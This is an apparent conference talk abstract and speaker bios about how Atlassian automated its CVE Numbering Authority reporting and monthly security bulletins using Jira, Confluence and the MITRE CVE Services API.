Automating CNA CVE Reporting and Monthly Bulletins at Atlassian

Deepak Chintala (Atlassian, US), Zachary Echouafni (Atlassian, US)

Running a CNA program inside a fast‑moving product security organization is hard enough; doing it while coordinating globally distributed engineering teams, multiple scanners, and manual JSON submissions to MITRE is a recipe for burnout and blind spots. At Atlassian, our CVE reporting started as an ad‑hoc, highly manual process: engineers hand‑crafted CVE JSON in MITRE’s GitHub repo, vulnerability data lived in scattered tools, and every disclosure felt like a bespoke project. Coverage was inconsistent, timelines were unpredictable, and the friction made it difficult to scale beyond a handful of teams. In this talk, I’ll walk through how I evolved that process into a fully automated CNA pipeline integrated with the MITRE CVE Services API and the Atlassian Cloud stack. I’ll show how we built an application on top of Jira and Confluence that lets engineers report CVEs through standard Jira tickets, auto‑drafts vulnerability reports using CVSSv4 vectors, and drives a monthly bulletin process that aggregates CVEs from dozens of engineering teams into a single, ready‑to‑review draft. I’ll dig into the hard parts: sanitizing vulnerability data coming from many scanners and sources, deciding what exploitation detail to include or omit, and building guardrails so we don’t leak sensitive information while still being transparent. Beyond the tooling, I’ll focus on the operational side. I’ll describe how we aligned product release cycles to a monthly patch timeline that supports coordinated disclosure, and how I built buy‑in with product engineering organizations across multiple geos. That includes establishing monthly on‑call rotations and clear ownership for security bulletins so that CVE reporting is a shared responsibility, not a security‑only burden. Attendees will leave with practical patterns for using the MITRE CVE Services API from within Jira, turning CVSSv4 data into structured reports, and building the relationships and processes needed to run a sustainable, high‑coverage CNA program.

---

Principal Product Security Engineer, Atlassian: Zachary Echouafni is the technical lead for Marketplace Security at Atlassian, owning Atlassian's CNA CVE program, vulnerability scanning, bug bounty and pen testing programs, app security reviews, Trust programs, and partner governance across thousands of external developers. Before Atlassian, he was a Principal Engineer at Dell Secureworks building XDR security products. His path was non-traditional with no formal education. He started hacking, coding and tinkering with robotics at a young age, entered the industry as a systems administrator, founded CDN/DDoS mitigation startup Shovl.io, and held security engineering roles at American Express and Dell. He brings a builder's mindset to security, automating CNA advisory processes to save 60 weeks of security time per year, driving shift-left scanning that blocks critical issues before apps hit the Marketplace, and architecting trust programs that raise the bar across the ecosystem.

Senior Manager, Product Security, Atlassian: Deepak Chintala leads Atlassian's Marketplace and Ecosystem Security team, a founding member of the group who joined in 2020 as an IC tech lead before growing into the team's engineering manager. His team of nine engineers owns the end-to-end security posture of the Atlassian Marketplace including application security automation, vulnerability management, incident response, and security architecture for the Forge platform. Previously he spent nearly five years on Visa's Product Security and Architecture team focused on SSDLC, code reviews, and security automation. He holds a Master's degree from Carnegie Mellon University. Deepak's leadership centers on scaling security through automation and AI, managing critical trust programs and marketplace risk reduction, and mentoring the next generation of security talent.

Видео Automating CNA CVE Reporting and Monthly Bulletins at Atlassian канала FIRST